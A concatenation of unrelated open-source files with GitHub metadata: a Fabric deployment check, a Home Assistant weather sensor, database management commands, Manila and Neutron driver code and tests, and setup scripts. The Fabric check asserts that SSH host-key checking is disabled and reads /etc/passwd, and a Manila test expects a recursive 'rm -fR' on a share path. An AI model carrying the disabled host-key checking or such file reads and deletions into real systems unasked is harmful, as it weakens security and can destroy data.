# user downloads.
log.debug('get_download_filename: %s' % (zpath,))
return zpath
| {
"content_hash": "9ad9ae1c3974a48200cbad079dbdcf53",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 76,
"avg_line_length": 24.698795180722893,
"alnum_prop": 0.5980487804878049,
"repo_name": "lbouma/Cyclopath",
"id": "b68cdae316352a8952e0e2e87fbde6e389f127f0",
"size": "2162",
"binary": false,
"copies": "1",
"ref": "refs/heads/release",
"path": "pyserver/item/jobsq/work_item_download.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "3369673"
},
{
"name": "ApacheConf",
"bytes": "46372"
},
{
"name": "C",
"bytes": "281248"
},
{
"name": "CSS",
"bytes": "36786"
},
{
"name": "Gnuplot",
"bytes": "14865"
},
{
"name": "HTML",
"bytes": "203213"
},
{
"name": "Java",
"bytes": "688800"
},
{
"name": "JavaScript",
"bytes": "60678"
},
{
"name": "M4",
"bytes": "35700"
},
{
"name": "Makefile",
"bytes": "8036"
},
{
"name": "PHP",
"bytes": "18399"
},
{
"name": "PLSQL",
"bytes": "451"
},
{
"name": "PLpgSQL",
"bytes": "1407944"
},
{
"name": "Perl",
"bytes": "669009"
},
{
"name": "Python",
"bytes": "5830046"
},
{
"name": "Shell",
"bytes": "639435"
}
],
"symlink_target": ""
} |
import re
from fabric.api import env, run, hide, task
from envassert import detect, file, group, package, port, process, service, \
user, text
def apache2_is_responding():
with hide('running', 'stdout'):
wget_cmd = (
"wget --quiet --output-document - --header='Host: example.com' "
"http://localhost/"
)
homepage = run(wget_cmd)
if re.search('Welcome to example.com', homepage):
return True
else:
return False
@task
def check():
env.platform_family = detect.detect()
config_js = '/var/app/current/config.js'
assert file.exists(config_js), \
"%s does not exist" % config_js
assert file_contains(config_js, 'StrictHostKeyChecking false'), \
"%s does not turn off StrictHostKeyChecking" % config_js
dot_npm = "/home/my_nodejs_app/.npm"
assert file.exists(dot_npm), \
"%s does not exist" % dot_npm
assert file.is_dir(dot_npm), \
"%s is not a directory" % dot_npm
assert file.is_mode(dot_npm, 'r-xr-xr-x'), \
"%s is not mode 755" % dot_npm
assert file.owner_is(dot_npm, 'my_nodejs_app'), \
"%s is not owned by my_nodejs_app" % dot_npm
# directory { should be_grouped_into 'my_nodejs_app' }
assert port.is_listening(80), "port 80/apache2 is not listening"
assert user.exists("my_nodejs_app"), "user my_nodejs_app does not exist"
assert user_has_shell('my_nodejs_app', ':/bin/bash'), \
"user should have bash shell"
assert process.is_up("node"), "node process is not up"
# its('args') { should match 'server.js|app.js' }
assert service.is_enabled("my_nodejs_app"), \
"my_nodejs_app service is not enabled"
assert apache2_is_responding(), "node demo app did not respond as expected"
def user_has_shell(uname, sname):
fname = '/etc/passwd'
user_line = file_find(fname, uname)
if not user_line:
return False
return sname in user_line
def file_contains(fname, txt):
with open(fname) as dataf:
return any(txt in line for line in dataf)
return False
def file_find(fname, txt):
with open(fname) as dataf:
for line in dataf:
if txt in line:
                return line
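# Illustrative note (an addition, not part of the original check script): on a
# host where the my_nodejs_app entry in /etc/passwd ends in ":/bin/bash",
# user_has_shell('my_nodejs_app', ':/bin/bash') returns True, because
# file_find() hands back the matching passwd line for the substring test.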
| {
"content_hash": "e067df8901477658244b49cbe70128ce",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 79,
"avg_line_length": 30.173333333333332,
"alnum_prop": 0.6129032258064516,
"repo_name": "prometheanfire/nodejs-multi",
"id": "dc9fab6ca935942a808877003cb0339df5cc7c54",
"size": "2263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/fabric/nodejsmulti.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2763"
},
{
"name": "Ruby",
"bytes": "400946"
}
],
"symlink_target": ""
} |
"""Support for the AccuWeather service."""
from __future__ import annotations
from typing import Any, cast
from homeassistant.components.sensor import SensorEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_DEVICE_CLASS,
ATTR_ICON,
CONF_NAME,
DEVICE_CLASS_TEMPERATURE,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from . import AccuWeatherDataUpdateCoordinator
from .const import (
API_IMPERIAL,
API_METRIC,
ATTR_ENABLED,
ATTR_FORECAST,
ATTR_LABEL,
ATTR_UNIT_IMPERIAL,
ATTR_UNIT_METRIC,
ATTRIBUTION,
COORDINATOR,
DOMAIN,
FORECAST_SENSOR_TYPES,
MANUFACTURER,
MAX_FORECAST_DAYS,
NAME,
SENSOR_TYPES,
)
PARALLEL_UPDATES = 1
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Add AccuWeather entities from a config_entry."""
name: str = entry.data[CONF_NAME]
coordinator: AccuWeatherDataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id][
COORDINATOR
]
sensors: list[AccuWeatherSensor] = []
for sensor in SENSOR_TYPES:
sensors.append(AccuWeatherSensor(name, sensor, coordinator))
if coordinator.forecast:
for sensor in FORECAST_SENSOR_TYPES:
for day in range(MAX_FORECAST_DAYS + 1):
# Some air quality/allergy sensors are only available for certain
# locations.
if sensor in coordinator.data[ATTR_FORECAST][0]:
sensors.append(
AccuWeatherSensor(name, sensor, coordinator, forecast_day=day)
)
async_add_entities(sensors)
class AccuWeatherSensor(CoordinatorEntity, SensorEntity):
"""Define an AccuWeather entity."""
coordinator: AccuWeatherDataUpdateCoordinator
def __init__(
self,
name: str,
kind: str,
coordinator: AccuWeatherDataUpdateCoordinator,
forecast_day: int | None = None,
) -> None:
"""Initialize."""
super().__init__(coordinator)
if forecast_day is None:
self._description = SENSOR_TYPES[kind]
self._sensor_data: dict[str, Any]
if kind == "Precipitation":
self._sensor_data = coordinator.data["PrecipitationSummary"][kind]
else:
self._sensor_data = coordinator.data[kind]
else:
self._description = FORECAST_SENSOR_TYPES[kind]
self._sensor_data = coordinator.data[ATTR_FORECAST][forecast_day][kind]
self._unit_system = API_METRIC if coordinator.is_metric else API_IMPERIAL
self._name = name
self.kind = kind
self._device_class = None
self._attrs = {ATTR_ATTRIBUTION: ATTRIBUTION}
self.forecast_day = forecast_day
@property
def name(self) -> str:
"""Return the name."""
if self.forecast_day is not None:
return f"{self._name} {self._description[ATTR_LABEL]} {self.forecast_day}d"
return f"{self._name} {self._description[ATTR_LABEL]}"
@property
def unique_id(self) -> str:
"""Return a unique_id for this entity."""
if self.forecast_day is not None:
return f"{self.coordinator.location_key}-{self.kind}-{self.forecast_day}".lower()
return f"{self.coordinator.location_key}-{self.kind}".lower()
@property
def device_info(self) -> DeviceInfo:
"""Return the device info."""
return {
"identifiers": {(DOMAIN, self.coordinator.location_key)},
"name": NAME,
"manufacturer": MANUFACTURER,
"entry_type": "service",
}
@property
def state(self) -> StateType:
"""Return the state."""
if self.forecast_day is not None:
if self._description["device_class"] == DEVICE_CLASS_TEMPERATURE:
return cast(float, self._sensor_data["Value"])
if self.kind == "UVIndex":
return cast(int, self._sensor_data["Value"])
if self.kind in ["Grass", "Mold", "Ragweed", "Tree", "Ozone"]:
return cast(int, self._sensor_data["Value"])
if self.kind == "Ceiling":
return round(self._sensor_data[self._unit_system]["Value"])
if self.kind == "PressureTendency":
return cast(str, self._sensor_data["LocalizedText"].lower())
if self._description["device_class"] == DEVICE_CLASS_TEMPERATURE:
return cast(float, self._sensor_data[self._unit_system]["Value"])
if self.kind == "Precipitation":
return cast(float, self._sensor_data[self._unit_system]["Value"])
if self.kind in ["Wind", "WindGust"]:
return cast(float, self._sensor_data["Speed"][self._unit_system]["Value"])
if self.kind in ["WindDay", "WindNight", "WindGustDay", "WindGustNight"]:
return cast(StateType, self._sensor_data["Speed"]["Value"])
return cast(StateType, self._sensor_data)
@property
def icon(self) -> str | None:
"""Return the icon."""
return self._description[ATTR_ICON]
@property
def device_class(self) -> str | None:
"""Return the device_class."""
return self._description[ATTR_DEVICE_CLASS]
@property
def unit_of_measurement(self) -> str | None:
"""Return the unit the value is expressed in."""
if self.coordinator.is_metric:
return self._description[ATTR_UNIT_METRIC]
return self._description[ATTR_UNIT_IMPERIAL]
@property
def extra_state_attributes(self) -> dict[str, Any]:
"""Return the state attributes."""
if self.forecast_day is not None:
if self.kind in ["WindDay", "WindNight", "WindGustDay", "WindGustNight"]:
self._attrs["direction"] = self._sensor_data["Direction"]["English"]
elif self.kind in ["Grass", "Mold", "Ragweed", "Tree", "UVIndex", "Ozone"]:
self._attrs["level"] = self._sensor_data["Category"]
return self._attrs
if self.kind == "UVIndex":
self._attrs["level"] = self.coordinator.data["UVIndexText"]
elif self.kind == "Precipitation":
self._attrs["type"] = self.coordinator.data["PrecipitationType"]
return self._attrs
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return self._description[ATTR_ENABLED]
| {
"content_hash": "74a882251658ca253de8b32d87abd889",
"timestamp": "",
"source": "github",
"line_count": 184,
"max_line_length": 93,
"avg_line_length": 37.141304347826086,
"alnum_prop": 0.622329528826456,
"repo_name": "kennedyshead/home-assistant",
"id": "09e9cda30adbb1e5ac1f7636819ab0db5c76036a",
"size": "6834",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/accuweather/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "33970989"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
} |
from webtools.management.base import Command
from webtools.database import Base
class SyncdbCommand(Command):
"""
Syncronize all available sqlalchemy defined tables
to a database server.
"""
def take_action(self, options):
if not self.cmdapp.conf:
            raise RuntimeError("The --settings parameter is mandatory"
                               " for this command!")
from webtools.application import Application
app = Application(self.cmdapp.conf)
        print("Create these tables:")
for tbl in Base.metadata.sorted_tables:
print(" * {0}".format(tbl.name))
res = input("Create [Y/n] ")
if not res or res.lower() == "y":
res = True
else:
res = False
if res:
Base.metadata.create_all(app.engine)
class DropdbCommand(Command):
"""
Remove all tables.
"""
def take_action(self, options):
if not self.cmdapp.conf:
            raise RuntimeError("The --settings parameter is mandatory"
                               " for this command!")
from webtools.application import Application
app = Application(self.cmdapp.conf)
        print("Drop these tables:")
for tbl in Base.metadata.sorted_tables:
print(" * {0}".format(tbl.name))
res = input("Drop [Y/n] ")
if not res or res.lower() == "y":
res = True
else:
res = False
if res:
Base.metadata.drop_all(app.engine)
| {
"content_hash": "20ce3998cea01c22f2cb849c8f307b11",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 71,
"avg_line_length": 26.46551724137931,
"alnum_prop": 0.5589576547231271,
"repo_name": "niwinz/tornado-webtools",
"id": "48a545939d8cb31b4050a5b2ecd7cca1bcc675b6",
"size": "1535",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webtools/management/commands/syncdb.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "72924"
},
{
"name": "Shell",
"bytes": "26"
}
],
"symlink_target": ""
} |
'''osmizer: convert simple GeoJSON-schema feature layers to the OSM XML format.
Documentation available at https://github.com/OpenSidewalks/osmizer.
'''
import re
import sys
from setuptools import setup, find_packages
# Check python versions
if sys.version_info.major < 3:
print('osmizer is currently compatible only with Python 3.')
sys.exit(1)
# Get version from package __init__.py
with open('osmizer/__init__.py', 'r') as f:
__version__ = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(), re.MULTILINE).group(1)
if not __version__:
raise RuntimeError('Cannot find version information')
doclines = __doc__.split('\n')
config = {
'name': 'osmizer',
'version': __version__,
'description': doclines[0],
'long_description': '\n'.join(doclines[2:]),
'author': '',
'author_email': '',
'maintainer': '',
'maintainer_email': '',
'url': 'https://github.com/OpenSidewalks/osmizer',
'license': 'BSD',
'download_url': 'https://github.com/OpenSidewalks/osmizer.git',
'install_requires': ['click',
'jsonschema',
'lxml',
'rtree'],
'packages': find_packages(),
'include_package_data': True,
'classifiers': ['Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3 :: Only'],
'zip_safe': False,
'entry_points': '''
[console_scripts]
osmizer=osmizer.__main__:cli
'''
}
setup(test_suite='nose.collector',
**config)
| {
"content_hash": "8965fac47d16e22efa3c607d0b213bd6",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 79,
"avg_line_length": 30.70909090909091,
"alnum_prop": 0.5648312611012434,
"repo_name": "OpenSidewalks/osmizer",
"id": "c0c4af1113f7941a35bf919d46f1f79a3350c1a2",
"size": "1689",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24610"
}
],
"symlink_target": ""
} |
"""Unit tests for the Container driver module."""
import ddt
import functools
import mock
from oslo_config import cfg
from manila.common import constants as const
from manila import context
from manila import exception
from manila.share import configuration
from manila.share.drivers.container import driver
from manila.share.drivers.container import protocol_helper
from manila import test
from manila.tests import fake_utils
from manila.tests.share.drivers.container import fakes as cont_fakes
CONF = cfg.CONF
CONF.import_opt('lvm_share_export_ip', 'manila.share.drivers.lvm')
@ddt.ddt
class ContainerShareDriverTestCase(test.TestCase):
"""Tests ContainerShareDriver"""
def setUp(self):
super(ContainerShareDriverTestCase, self).setUp()
fake_utils.stub_out_utils_execute(self)
self._context = context.get_admin_context()
self._db = mock.Mock()
self.fake_conf = configuration.Configuration(None)
CONF.set_default('driver_handles_share_servers', True)
self._driver = driver.ContainerShareDriver(
configuration=self.fake_conf)
self.share = cont_fakes.fake_share()
self.access = cont_fakes.fake_access()
self.server = {
'public_address': self.fake_conf.lvm_share_export_ip,
'instance_id': 'LVM',
}
# Used only to test compatibility with share manager
self.share_server = "fake_share_server"
def fake_exec_sync(self, *args, **kwargs):
kwargs['execute_arguments'].append(args)
try:
ret_val = kwargs['ret_val']
except KeyError:
ret_val = None
return ret_val
def test__get_helper_ok(self):
share = cont_fakes.fake_share(share_proto='CIFS')
expected = protocol_helper.DockerCIFSHelper(None)
actual = self._driver._get_helper(share)
self.assertEqual(type(expected), type(actual))
def test__get_helper_existing_ok(self):
share = cont_fakes.fake_share(share_proto='CIFS')
expected = protocol_helper.DockerCIFSHelper
self._driver._helpers = {'CIFS': expected}
actual = self._driver._get_helper(share)
self.assertEqual(expected, type(actual))
def test__get_helper_not_ok(self):
share = cont_fakes.fake_share()
self.assertRaises(exception.InvalidShare, self._driver._get_helper,
share)
def test_update_share_stats(self):
self.mock_object(self._driver.storage, 'get_share_server_pools',
mock.Mock(return_value='test-pool'))
self._driver._update_share_stats()
self.assertEqual('Docker', self._driver._stats['share_backend_name'])
self.assertEqual('CIFS', self._driver._stats['storage_protocol'])
self.assertEqual(0, self._driver._stats['reserved_percentage'])
self.assertIsNone(self._driver._stats['consistency_group_support'])
self.assertEqual(False, self._driver._stats['snapshot_support'])
self.assertEqual('ContainerShareDriver',
self._driver._stats['driver_name'])
self.assertEqual('test-pool', self._driver._stats['pools'])
def test_create_share(self):
helper = mock.Mock()
self.mock_object(helper, 'create_share',
mock.Mock(return_value='export_location'))
self.mock_object(self._driver, "_get_helper",
mock.Mock(return_value=helper))
self.mock_object(self._driver.storage, 'provide_storage')
self.mock_object(self._driver.container, 'execute')
self.assertEqual('export_location',
self._driver.create_share(self._context, self.share,
{'id': 'fake'}))
def test_delete_share_ok(self):
helper = mock.Mock()
self.mock_object(self._driver, "_get_helper",
mock.Mock(return_value=helper))
self.mock_object(self._driver.container, 'execute')
self.mock_object(self._driver.storage, 'remove_storage')
self._driver.delete_share(self._context, self.share, {'id': 'fake'})
self._driver.container.execute.assert_called_with(
'manila_fake',
['rm', '-fR', '/shares/fakeshareid']
)
def test_delete_share_rm_fails(self):
def fake_execute(*args):
if 'rm' in args[1]:
raise exception.ProcessExecutionError()
self.mock_object(driver.LOG, "warning")
self.mock_object(self._driver, "_get_helper")
self.mock_object(self._driver.container, "execute", fake_execute)
self.mock_object(self._driver.storage, 'remove_storage')
self._driver.delete_share(self._context, self.share, {'id': 'fake'})
self.assertTrue(driver.LOG.warning.called)
def test_extend_share(self):
share = cont_fakes.fake_share()
actual_arguments = []
expected_arguments = [
('manila_fake_server', ['umount', '/shares/fakeshareid']),
('manila_fake_server',
['mount', '/dev/manila_docker_volumes/fakeshareid',
'/shares/fakeshareid'])
]
self.mock_object(self._driver.storage, "extend_share")
self._driver.container.execute = functools.partial(
self.fake_exec_sync, execute_arguments=actual_arguments,
ret_val='')
self._driver.extend_share(share, 2, {'id': 'fake-server'})
self.assertEqual(expected_arguments, actual_arguments)
def test_ensure_share(self):
# Does effectively nothing by design.
self.assertEqual(1, 1)
def test_update_access_access_rules_ok(self):
helper = mock.Mock()
self.mock_object(self._driver, "_get_helper",
mock.Mock(return_value=helper))
self._driver.update_access(self._context, self.share,
[{'access_level': const.ACCESS_LEVEL_RW}],
[], [], {"id": "fake"})
helper.update_access.assert_called_with('manila_fake',
[{'access_level': 'rw'}],
[], [])
def test_get_network_allocation_numer(self):
# Does effectively nothing by design.
self.assertEqual(1, self._driver.get_network_allocations_number())
def test__get_container_name(self):
self.assertEqual("manila_fake_server",
self._driver._get_container_name("fake-server"))
def test_do_setup(self):
# Does effectively nothing by design.
self.assertEqual(1, 1)
def test_check_for_setup_error_host_not_ok_class_ok(self):
setattr(self._driver.configuration.local_conf,
'neutron_host_id', None)
self.assertRaises(exception.ManilaException,
self._driver.check_for_setup_error)
def test_check_for_setup_error_host_not_ok_class_some_other(self):
setattr(self._driver.configuration.local_conf,
'neutron_host_id', None)
setattr(self._driver.configuration.local_conf,
'network_api_class',
'manila.share.drivers.container.driver.ContainerShareDriver')
self.mock_object(driver.LOG, "warning")
self._driver.check_for_setup_error()
setattr(self._driver.configuration.local_conf,
'network_api_class',
'manila.network.neutron.neutron_network_plugin.'
'NeutronNetworkPlugin')
self.assertTrue(driver.LOG.warning.called)
def test__connect_to_network(self):
network_info = cont_fakes.fake_network()
helper = mock.Mock()
self.mock_object(self._driver, "_execute",
mock.Mock(return_value=helper))
self.mock_object(self._driver.container, "execute")
self._driver._connect_to_network("fake-server", network_info,
"fake-veth")
@ddt.data(['veth0000000'], ['veth0000000' * 2])
def test__teardown_server(self, list_of_veths):
def fake_ovs_execute(*args, **kwargs):
kwargs['arguments'].append(args)
if len(args) == 3:
return list_of_veths
elif len(args) == 4:
return ('fake:manila_b5afb5c1_6011_43c4_8a37_29820e6951a7', '')
else:
return 0
actual_arguments = []
expected_arguments = [
('ovs-vsctl', 'list', 'interface'),
('ovs-vsctl', 'list', 'interface', 'veth0000000'),
('ovs-vsctl', '--', 'del-port', 'br-int', 'veth0000000')
]
self.mock_object(self._driver.container, "stop_container", mock.Mock())
self._driver._execute = functools.partial(
fake_ovs_execute, arguments=actual_arguments)
self._driver._teardown_server(
server_details={"id": "b5afb5c1-6011-43c4-8a37-29820e6951a7"})
self.assertEqual(expected_arguments.sort(), actual_arguments.sort())
@ddt.data(['veth0000000'], ['veth0000000' * 2])
def test__teardown_server_veth_disappeared_mysteriously(self,
list_of_veths):
def fake_ovs_execute(*args, **kwargs):
if len(args) == 3:
return list_of_veths
if len(args) == 4:
return ('fake:manila_b5afb5c1_6011_43c4_8a37_29820e6951a7', '')
if 'del-port' in args:
raise exception.ProcessExecutionError()
else:
return 0
self.mock_object(driver.LOG, "warning")
self.mock_object(self._driver, "_execute", fake_ovs_execute)
self._driver._teardown_server(
server_details={"id": "b5afb5c1-6011-43c4-8a37-29820e6951a7"})
self.assertTrue(driver.LOG.warning.called)
@ddt.data(['veth0000000'], ['veth0000000' * 2])
def test__teardown_server_check_continuation(self, list_of_veths):
def fake_ovs_execute(*args, **kwargs):
kwargs['arguments'].append(args)
if len(args) == 3:
return list_of_veths
elif len(args) == 4:
return ('fake:', '')
else:
return 0
actual_arguments = []
expected_arguments = [
('ovs-vsctl', 'list', 'interface'),
('ovs-vsctl', 'list', 'interface', 'veth0000000'),
('ovs-vsctl', '--', 'del-port', 'br-int', 'veth0000000')
]
self.mock_object(self._driver.container, "stop_container", mock.Mock())
self._driver._execute = functools.partial(
fake_ovs_execute, arguments=actual_arguments)
self._driver._teardown_server(
server_details={"id": "b5afb5c1-6011-43c4-8a37-29820e6951a7"})
self.assertEqual(expected_arguments.sort(), actual_arguments.sort())
def test__get_veth_state(self):
retval = ('veth0000000\n', '')
self.mock_object(self._driver, "_execute",
mock.Mock(return_value=retval))
result = self._driver._get_veth_state()
self.assertEqual(['veth0000000'], result)
def test__get_corresponding_veth_ok(self):
before = ['veth0000000']
after = ['veth0000000', 'veth0000001']
result = self._driver._get_corresponding_veth(before, after)
self.assertEqual('veth0000001', result)
def test__get_corresponding_veth_raises(self):
before = ['veth0000000']
after = ['veth0000000', 'veth0000001', 'veth0000002']
self.assertRaises(exception.ManilaException,
self._driver._get_corresponding_veth,
before, after)
def test__setup_server_container_fails(self):
network_info = cont_fakes.fake_network()
self.mock_object(self._driver.container, 'start_container')
self._driver.container.start_container.side_effect = KeyError()
self.assertRaises(exception.ManilaException,
self._driver._setup_server, network_info)
def test__setup_server_ok(self):
network_info = cont_fakes.fake_network()
server_id = self._driver._get_container_name(network_info["server_id"])
self.mock_object(self._driver.container, 'start_container')
self.mock_object(self._driver, '_get_veth_state')
self.mock_object(self._driver, '_get_corresponding_veth',
mock.Mock(return_value='veth0'))
self.mock_object(self._driver, '_connect_to_network')
self.assertEqual(network_info['server_id'],
self._driver._setup_server(network_info)['id'])
self._driver.container.start_container.assert_called_once_with(
server_id)
self._driver._connect_to_network.assert_called_once_with(server_id,
network_info,
'veth0')
| {
"content_hash": "e4ad3a83e9cc53cf78c64c2e1dc9c0b1",
"timestamp": "",
"source": "github",
"line_count": 334,
"max_line_length": 79,
"avg_line_length": 39.31137724550898,
"alnum_prop": 0.5852246763137853,
"repo_name": "vponomaryov/manila",
"id": "57877ff028ded9624daad0a9d1e6d02414570b25",
"size": "13759",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/tests/share/drivers/container/test_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "9697997"
},
{
"name": "Shell",
"bytes": "103800"
}
],
"symlink_target": ""
} |
import sqlalchemy as sa
from neutron.db import api as db
from neutron.db import model_base
from neutron.db import models_v2
from neutron.db import securitygroups_db as sg_db
from neutron.extensions import securitygroup as ext_sg
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.plugins.nec.common import config # noqa
from neutron.plugins.nec.common import exceptions as nexc
from neutron.plugins.nec.db import models as nmodels
LOG = logging.getLogger(__name__)
OFP_VLAN_NONE = 0xffff
resource_map = {'ofc_tenant': nmodels.OFCTenantMapping,
'ofc_network': nmodels.OFCNetworkMapping,
'ofc_port': nmodels.OFCPortMapping,
'ofc_router': nmodels.OFCRouterMapping,
'ofc_packet_filter': nmodels.OFCFilterMapping}
old_resource_map = {'ofc_tenant': nmodels.OFCTenant,
'ofc_network': nmodels.OFCNetwork,
'ofc_port': nmodels.OFCPort,
'ofc_packet_filter': nmodels.OFCFilter}
# utility methods
def _get_resource_model(resource, old_style):
if old_style:
# NOTE: Some new resources are not defined in old_resource_map.
# In such case None is returned.
return old_resource_map.get(resource)
else:
return resource_map[resource]
def initialize():
db.configure_db()
def clear_db(base=model_base.BASEV2):
db.clear_db(base)
def get_ofc_item(session, resource, neutron_id, old_style=False):
model = _get_resource_model(resource, old_style)
if not model:
return None
try:
return session.query(model).filter_by(quantum_id=neutron_id).one()
except sa.orm.exc.NoResultFound:
return None
def get_ofc_id(session, resource, neutron_id, old_style=False):
ofc_item = get_ofc_item(session, resource, neutron_id, old_style)
if ofc_item:
if old_style:
return ofc_item.id
else:
return ofc_item.ofc_id
else:
return None
def exists_ofc_item(session, resource, neutron_id, old_style=False):
if get_ofc_item(session, resource, neutron_id, old_style):
return True
else:
return False
def find_ofc_item(session, resource, ofc_id, old_style=False):
try:
model = _get_resource_model(resource, old_style)
if old_style:
params = dict(id=ofc_id)
else:
params = dict(ofc_id=ofc_id)
return (session.query(model).filter_by(**params).one())
except sa.orm.exc.NoResultFound:
return None
def add_ofc_item(session, resource, neutron_id, ofc_id, old_style=False):
try:
model = _get_resource_model(resource, old_style)
if old_style:
params = dict(quantum_id=neutron_id, id=ofc_id)
else:
params = dict(quantum_id=neutron_id, ofc_id=ofc_id)
item = model(**params)
with session.begin(subtransactions=True):
session.add(item)
session.flush()
except Exception as exc:
LOG.exception(exc)
raise nexc.NECDBException(reason=exc.message)
return item
def del_ofc_item(session, resource, neutron_id, old_style=False,
warning=True):
try:
model = _get_resource_model(resource, old_style)
with session.begin(subtransactions=True):
item = session.query(model).filter_by(quantum_id=neutron_id).one()
session.delete(item)
return True
except sa.orm.exc.NoResultFound:
if warning:
LOG.warning(_("_del_ofc_item(): NotFound item "
"(model=%(model)s, id=%(id)s) "),
{'model': model, 'id': neutron_id})
return False
def get_ofc_id_lookup_both(session, resource, neutron_id):
ofc_id = get_ofc_id(session, resource, neutron_id)
# Lookup old style of OFC mapping table
if not ofc_id:
ofc_id = get_ofc_id(session, resource, neutron_id,
old_style=True)
if not ofc_id:
reason = (_("NotFound %(resource)s for neutron_id=%(id)s.")
% {'resource': resource, 'id': neutron_id})
raise nexc.OFCConsistencyBroken(reason=reason)
return ofc_id
def exists_ofc_item_lookup_both(session, resource, neutron_id):
if exists_ofc_item(session, resource, neutron_id):
return True
# Check old style of OFC mapping table
if exists_ofc_item(session, resource, neutron_id,
old_style=True):
return True
return False
def del_ofc_item_lookup_both(session, resource, neutron_id):
# Delete the mapping from new style of OFC mapping table
if del_ofc_item(session, resource, neutron_id,
old_style=False, warning=False):
return
# Delete old style of OFC mapping table
if del_ofc_item(session, resource, neutron_id,
old_style=True, warning=False):
return
# The specified resource not found
LOG.warning(_("_del_ofc_item(): NotFound item "
"(resource=%(resource)s, id=%(id)s) "),
{'resource': resource, 'id': neutron_id})
def get_portinfo(session, id):
try:
return (session.query(nmodels.PortInfo).
filter_by(id=id).
one())
except sa.orm.exc.NoResultFound:
return None
def add_portinfo(session, id, datapath_id='', port_no=0,
vlan_id=OFP_VLAN_NONE, mac=''):
try:
portinfo = nmodels.PortInfo(id=id, datapath_id=datapath_id,
port_no=port_no, vlan_id=vlan_id, mac=mac)
with session.begin(subtransactions=True):
session.add(portinfo)
except Exception as exc:
LOG.exception(exc)
raise nexc.NECDBException(reason=exc.message)
return portinfo
def del_portinfo(session, id):
try:
with session.begin(subtransactions=True):
portinfo = session.query(nmodels.PortInfo).filter_by(id=id).one()
session.delete(portinfo)
except sa.orm.exc.NoResultFound:
LOG.warning(_("del_portinfo(): NotFound portinfo for "
"port_id: %s"), id)
def get_port_from_device(port_id):
"""Get port from database."""
LOG.debug(_("get_port_with_securitygroups() called:port_id=%s"), port_id)
session = db.get_session()
sg_binding_port = sg_db.SecurityGroupPortBinding.port_id
query = session.query(models_v2.Port,
sg_db.SecurityGroupPortBinding.security_group_id)
query = query.outerjoin(sg_db.SecurityGroupPortBinding,
models_v2.Port.id == sg_binding_port)
query = query.filter(models_v2.Port.id == port_id)
port_and_sgs = query.all()
if not port_and_sgs:
return None
port = port_and_sgs[0][0]
plugin = manager.NeutronManager.get_plugin()
port_dict = plugin._make_port_dict(port)
port_dict[ext_sg.SECURITYGROUPS] = [
sg_id for port_, sg_id in port_and_sgs if sg_id]
port_dict['security_group_rules'] = []
port_dict['security_group_source_groups'] = []
port_dict['fixed_ips'] = [ip['ip_address']
for ip in port['fixed_ips']]
return port_dict
| {
"content_hash": "c728d8da8ce22685ae332637e8ceffd9",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 78,
"avg_line_length": 33.64351851851852,
"alnum_prop": 0.6157974404843815,
"repo_name": "kaiweifan/neutron",
"id": "e606861ff2247cdb9298fb66b587cd6c247c4c19",
"size": "7966",
"binary": false,
"copies": "9",
"ref": "refs/heads/vip5",
"path": "neutron/plugins/nec/db/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6886068"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
from __future__ import division, unicode_literals
from math import sin, cos, asin, pi, degrees, radians
import os
import collections
import numpy as np
import json
from pymatgen.core.spectrum import Spectrum
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.plotting import add_fig_kwargs
"""
This module implements an XRD pattern calculator.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "[email protected]"
__date__ = "5/22/14"
# XRD wavelengths in angstroms
WAVELENGTHS = {
"CuKa": 1.54184,
"CuKa2": 1.54439,
"CuKa1": 1.54056,
"CuKb1": 1.39222,
"MoKa": 0.71073,
"MoKa2": 0.71359,
"MoKa1": 0.70930,
"MoKb1": 0.63229,
"CrKa": 2.29100,
"CrKa2": 2.29361,
"CrKa1": 2.28970,
"CrKb1": 2.08487,
"FeKa": 1.93735,
"FeKa2": 1.93998,
"FeKa1": 1.93604,
"FeKb1": 1.75661,
"CoKa": 1.79026,
"CoKa2": 1.79285,
"CoKa1": 1.78896,
